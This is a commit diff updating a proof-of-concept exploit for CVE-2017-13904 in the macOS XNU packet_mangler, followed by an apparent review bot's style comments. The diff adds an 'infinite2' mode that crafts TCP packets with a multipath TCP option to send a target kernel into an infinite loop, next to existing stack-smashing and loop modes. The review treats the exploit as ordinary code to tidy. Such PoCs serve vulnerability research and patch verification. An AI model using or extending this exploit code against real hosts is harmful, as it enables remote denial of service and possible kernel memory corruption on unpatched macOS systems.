
Commit 25cf1b9

Update PoC for Mojave
1 parent 4b6a3b8 commit 25cf1b9

1 file changed

Lines changed: 10 additions & 1 deletion


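--- a/apple/darwin-xnu/packet_mangler_CVE-2017-13904/cve-2017-13904-poc.c
+++ b/apple/darwin-xnu/packet_mangler_CVE-2017-13904/cve-2017-13904-poc.c
@@ -15,6 +15,8 @@
 #include <netinet/ip.h>
 #include <arpa/inet.h>
 
+#define TCP_OPT_MULTIPATH_TCP 30
+
 // 96 bit (12 bytes) pseudo header needed for tcp header checksum calculation
 struct pseudo_header
 {
@@ -56,6 +58,7 @@ unsigned short csum(unsigned short *ptr, int nbytes)
 
 enum Mode {
 InfiniteLoopMode,
+InfiniteLoopMode2,
 SmashStackMode
 };
 
@@ -83,6 +86,9 @@ int main(int argc, char* argv[])
 
 if (strcmp(argv[3], "infinite") == 0) {
 mode = InfiniteLoopMode;
+} else if (strcmp(argv[3], "infinite2") == 0) {
+mode = InfiniteLoopMode2;
+printf("infinite2\n");
 } else if (strcmp(argv[3], "smashstack") == 0) {
 mode = SmashStackMode;
 payloadsize = 1000;
@@ -117,9 +123,12 @@ int main(int argc, char* argv[])
 data = datagram + sizeof(struct iphdr) + sizeof(struct tcphdr);
 memset(data, 1, payloadsize);
 
-if (mode != SmashStackMode) {
+if (mode == InfiniteLoopMode) {
 data[0] = 2;
 data[1] = 0;
+} else if (mode == InfiniteLoopMode2) {
+data[0] = TCP_OPT_MULTIPATH_TCP;
+data[1] = 0;
 }
 
 // some address resolution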
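Review bot: The new `infinite2` branch in main() (new line 91) keeps a stray `printf("infinite2\n");` that the `infinite` and `smashstack` branches do not have. It reads like leftover debug output, so either drop it or print the selected mode once after the whole if/else chain. The commit names the new option kind with `TCP_OPT_MULTIPATH_TCP`, but the older branch still writes the bare literal in `data[0] = 2;`, so a matching `#define` for that kind would keep the two branches consistent. Neither mode says which system build it is meant to be checked against; a one-line comment on the enum, such as `/* InfiniteLoopMode2: variant added for Mojave */`, would let someone verifying a patched host pick the right mode. main() starts and ends outside these hunks, so the argc check guarding `argv[3]` and any usage text that should list `infinite2` are not visible here.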
